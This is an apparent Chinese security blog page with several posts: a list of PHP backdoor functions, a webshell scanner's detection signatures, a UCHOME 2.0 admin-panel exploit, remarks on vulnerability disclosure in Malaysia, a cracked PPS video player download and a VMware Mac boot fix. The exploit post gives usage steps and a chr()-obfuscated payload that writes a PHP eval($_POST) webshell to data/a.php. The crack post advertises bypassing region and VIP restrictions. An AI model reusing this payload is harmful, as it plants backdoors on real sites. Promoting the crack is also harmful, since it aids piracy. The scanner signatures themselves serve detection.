【原创】浅析php后门木马

php后门木马对大家来说一点都不陌生吧，但是它的种类您又知多少呢？
本文为您浅析说明一些php后门木马常用的函数

php后门木马常用的函数大致上可分为四种类型：
1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open
2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13
3. 文件包含与生成: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite
4. .htaccess: SetHandler, auto_prepend_file, auto_append_file

详文请查看pdf

【原创】php Web 木马扫描器

一个在php环境下扫描php木马的工具，目前可扫出以下特征码

后门特征->cha88.cn
后门特征->c99shell
后门特征->phpspy
后门特征->Scanners
后门特征->cmd.php
后门特征->str_rot13
后门特征->webshell
后门特征->EgY_SpIdEr
后门特征->tools88.com
后门特征->SECFORCE
后门特征->eval("?>
可疑代码特征->system(
可疑代码特征->passthru(
可疑代码特征->shell_exec(
可疑代码特征->exec(
可疑代码特征->popen(
可疑代码特征->proc_open
可疑代码特征->eval($
可疑代码特征->assert($
危险MYSQL代码->returns string soname
危险MYSQL代码->into outfile
危险MYSQL代码->load_file
加密后门特征->eval(gzinflate(
加密后门特征->eval(base64_decode(
加密后门特征->eval(gzuncompress(
加密后门特征->gzuncompress(base64_decode(
加密后门特征->base64_decode(gzuncompress(
一句话后门特征->eval($_
一句话后门特征->assert($_
一句话后门特征->require($_
一句话后门特征->require_once($_
一句话后门特征->include($_
一句话后门特征->include_once($_
一句话后门特征->call_user_func("assert"
一句话后门特征->call_user_func($_
一句话后门特征->$_POST/GET/REQUEST/COOKIE[?]($_POST/GET/REQUEST/COOKIE[?]
一句话后门特征->echo(file_get_contents($_POST/GET/REQUEST/COOKIE
上传后门特征->file_put_contents($_POST/GET/REQUEST/COOKIE,$_POST/GET/REQUEST/COOKIE
上传后门特征->fputs(fopen("?","w"),$_POST/GET/REQUEST/COOKIE[
.htaccess插马特征->SetHandler application/x-httpd-php
.htaccess插马特征->php_value auto_prepend_file
.htaccess插马特征->php_value auto_append_file

懒惰设计，直接套用phpspy样式

注意: 扫描出来的文件并不一定就是后门,  请自行判断、审核、对比原文件。

115网盘下载

【原创】UCHOME 2.0 后台GET Shell

UCHOME 2.0 后台GET Shell

还记得陆羽那个UCHOME 2.0 后台GET Shell吧？
官方真的修复了吗？下面我们来看看代码

js.php

$s = array("/(\r|\n)/", "/\.+?\<\/div\>/is", "/\s+(href|src)=\"(.+?)\"/ie");
$r = array("\n", '', "js_mkurl('\\1', '\\2')"); //官方修复这里，使用单引号闭合, 貌似完美修复

但其实这个js.php还有一处存在漏洞，就在旧漏洞的前几行，非常明显

include template("data/blocktpl/$id"); //就是这里，直接include

$obcontent = ob_get_contents();
obclean();

$s = array("/(\r|\n)/", "/\.+?\<\/div\>/is", "/\s+(href|src)=\"(.+?)\"/ie");
$r = array("\n", '', "js_mkurl('\\1', '\\2')"); //官方修复这里，使用单引号闭合, 貌似完美修复

漏洞利用:
步骤和路羽的一样
1. admincp.php?ac=block&op=add 添加一个新模块
2. 数据显示Html代码处使用闭合数据:

<php eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(100).chr(97).chr(116).chr(97).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))>

3. 保存后检查一下ID,如果ID是1,则访问一下js.php?id=1
4. 访问后data 目录下多出了一个a.php

马来西亚网络安全艰难之路

白帽子？在马来西亚又有多少人懂？

这几周和朋友发了一些国内稍有规模的中形网站漏洞给网站管理员，结果只有一个表示谢意(感谢他的回复)，其它的不是没有回复就是叫我们删除帖子，并指责我们没事去挖他们网站漏洞干嘛...

在国外，有专属的网站让漏洞发掘者发布那些漏洞，有些公司还发悬赏找漏洞，如果你发现google, facebook, microsoft的安全漏洞，告知他们就会得到高额的奖金。在中国，漏洞提交者最少也会得到一些小礼物以示感谢；在国内，只求一个电邮回复也难如登天，可想而知国内网络世界是多么的不成熟....

手头上大站的漏洞不少，发又怕遇到那些问题，不发的话哪天某个国际组织光临又是横尸遍野....

黑客入侵游戏

向大家介绍一个马来西亚本土的论坛 i-secure.org
i-secure.org 主要是讨论一些网络安全与防范的课题。

论坛也假设了一个关卡式(21关)的虚拟黑客入侵游戏等待您来挑战。

PPS影音V2.7.0.1310 海外港剧破解版

下载地址: PPS v2.7.0.1310 完整版+破解补丁
-突破中国以外用户播放最新港剧
-突破VIP用户观看VIP视频(登陆任意账号即可)。

最新港剧

播放VIP影片

Mac OS + VMWare 开机卡在白苹果页面

尝试在vmware 7.1下安装mac os 10.6.x, 试了几个版本，安装时都没问题，但是只要一重启就卡在开机白苹果页面，苹果下面的风火轮都没出现。经过反复的测试，发现只要在.vmx文件下加入这行就能完美开机了：

firmware = "efi"